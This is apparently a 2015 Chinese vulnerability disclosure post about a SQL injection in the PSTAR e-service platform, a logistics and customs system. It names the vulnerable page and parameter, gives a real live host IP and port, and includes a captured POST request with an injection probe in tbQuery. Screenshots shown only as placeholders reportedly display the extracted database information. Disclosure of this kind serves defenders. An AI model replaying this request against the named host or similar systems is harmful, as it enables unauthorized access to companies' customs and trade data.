首页 > 安全 > 网站安全 >

PSTAR-电子服务平台SQL注入漏洞

2015-03-19

上海泛星计算机系统有限公司是一家专业开发物流管理软件与国际货运管理软件的资深物流软件公司。详细说明:系统名称:PSTAR-电子服务平台系统开发厂商:上海泛星计算机系统有限公司系统架构:aspx+mssql漏洞文件:

系统名称:PSTAR-电子服务平台


系统开发厂商:上海泛星计算机系统有限公司

系统架构:aspx+mssql

漏洞文件:custom/qcustoms.aspx

POST注入参数:tbQuery

都是些物流报关信息。。。海关数据

。。。。不多说

以http://122.227.225.98:8888/custom/qcustoms.aspx为例:

报单号查询模块

看到中华人民共和国海关货物出口报关单 。。。已不忍。。。。

1.png



截取数据包如下:

POST /custom/qcustoms.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://122.227.225.98:8888/custom/qcustoms.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 2445
DNT: 1
Host: 122.227.225.98:8888
Pragma: no-cache
Cookie: ASP.NET_SessionId=i0ugrcmhyimiw3awushnnozf

__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMjE2NTk3NDY5D2QWAgIDD2QWggICCA8PFgIeBFRleHRlZGQCCQ8PFgIfAGVkZAIKDw8WAh8AZWRkAgsPDxYCHwBlZGQCDA8PFgIfAGVkZAINDw8WAh8AZWRkAg4PDxYCHwBlZGQCDw8PFgIfAGVkZAIQDw8WAh8AZWRkAhEPDxYCHwBlZGQCEg8PFgIfAGVkZAITDw8WAh8AZWRkAhQPDxYCHwBlZGQCFQ8PFgIfAGVkZAIWDw8WAh8AZWRkAhcPDxYCHwBlZGQCGA8PFgIfAGVkZAIZDw8WAh8AZWRkAhoPDxYCHwBlZGQCGw8PFgIfAGVkZAIcDw8WAh8AZWRkAh0PDxYCHwBlZGQCHg8PFgIfAGVkZAIfDw8WAh8AZWRkAiAPDxYCHwBlZGQCIQ8PFgIfAGVkZAIiDw8WAh8AZWRkAiMPDxYCHwBlZGQCJA8PFgIfAGVkZAIlDw8WAh8AZWRkAiYPDxYCHwBlZGQCJw8PFggeC0JvcmRlcldpZHRoGwAAAAAAAAAAAQAAAB8AZR4EXyFTQgIgHghSZWFkT25seWcWAh4Fc3R5bGUFEk9WRVJGTE9XLVk6aGlkZGVuO2QCKA8PFgIfAGVkZAIpDw8WAh8AZWRkAioPDxYCHwBlZGQCKw8PFgIfAGVkZAIsDw8WAh8AZWRkAi0PDxYCHwBlZGQCLg8PFgIfAGVkZAIvDw8WAh8AZWRkAjAPDxYCHwBlZGQCMQ8PFgIfAGVkZAIyDw8WAh8AZWRkAjMPDxYCHwBlZGQCNA8PFgIfAGVkZAI1Dw8WAh8AZWRkAjYPDxYCHwBlZGQCNw8PFgIfAGVkZAI4Dw8WAh8AZWRkAjkPDxYCHwBlZGQCOg8PFgIfAGVkZAI7Dw8WAh8AZWRkAjwPDxYCHwBlZGQCPQ8PFgIfAGVkZAI%2BDw8WAh8AZWRkAj8PDxYCHwBlZGQCQA8PFgIfAGVkZAJBDw8WAh8AZWRkAkIPDxYCHwBlZGQCQw8PFgIfAGVkZAJEDw8WAh8AZWRkAkUPDxYCHwBlZGQCRg8PFgIfAGVkZAJHDw8WAh8AZWRkAkgPDxYCHwBlZGQCSQ8PFgIfAGVkZAJKDw8WAh8AZWRkAksPDxYCHwBlZGQCTA8PFgIfAGVkZAJNDw8WAh8AZWRkAk4PDxYCHwBlZGQCTw8PFgIfAGVkZAJQDw8WAh8AZWRkAlEPDxYCHwBlZGQCUg8PFgIfAGVkZAJTDw8WAh8AZWRkAlQPDxYCHwBlZGQCVQ8PFgIfAGVkZAJWDw8WAh8AZWRkAlcPDxYCHwBlZGQCWA8PFgIfAGVkZAJZDw8WAh8AZWRkAloPDxYCHwBlZGQCWw8PFgIfAGVkZAJcDw8WAh8AZWRkAl0PDxYCHwBlZGQCXg8PFgIfAGVkZAJfDw8WAh8AZWRkAmAPDxYCHwBlZGQCYQ8PFgIfAGVkZAJiDw8WAh8AZWRkAmMPDxYCHwBlZGQCZA8PFgIfAGVkZAJlDw8WAh8AZWRkAmYPDxYCHwBlZGQCZw8PFgIfAGVkZAJoDw8WAh8AZWRkAmkPDxYCHwBlZGQCag8PFgIfAGVkZAJrDw8WAh8AZWRkAmwPDxYCHwBlZGQCbQ8PFgIfAGVkZAJuDw8WAh8AZWRkAm8PDxYCHwBlZGQCcA8PFgIfAGVkZAJxDw8WAh8AZWRkAnIPDxYCHwBlZGQCcw8PFgIfAGVkZAJ0Dw8WAh8AZWRkAnUPDxYCHwBlZGQCdg8PFgIfAGVkZAJ3Dw8WAh8AZWRkAngPDxYIHwEbAAAAAAAAAAABAAAAHwBlHwICIB8DZxYCHwQFEk9WRVJGTE9XLVk6aGlkZGVuO2QCeQ8PFgIfAGVkZAJ6Dw8WAh8AZWRkAnsPDxYIHwEbAAAAAAAAAAABAAAAHwBlHwICIB8DZxYCHwQFEk9WRVJGTE9XLVk6aGlkZGVuO2QCfA8PFgIfAGVkZAJ9Dw8WAh8AZWRkAn4PDxYCHwBlZGQCfw8PFgIfAGVkZAKAAQ8PFgIfAGVkZAKBAQ8PFgIfAGVkZAKCAQ8PFgIfAGVkZAKDAQ8PFgIfAGVkZAKEAQ8PFgIfAGVkZAKFAQ8PFgIfAGVkZAKGAQ8PFgIfAGVkZAKHAQ8PFgIfAGVkZAKIAQ8PFgIfAGVkZGRECKyz8jsUg1a2jLqK7c74xQAXbg%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBwLt2IP%2FBALV3sTYCwLvjry%2FBQL%2B6YyoCgL8ps%2BKAwKbyYKsBAL4suukCt6ZkM39oI7LhGtUQoRT7kBgo3Oo&tbQuery=admin%27&btnQuery=%B2%E9%D1%AF&marks=&collection_tax=&remarks=



测试结果如下:

1.png


2.png



进而可获取其他相关信息:

1.png



当前数据库

1.png


解决方案:

过滤

相关文章
最新文章
热点推荐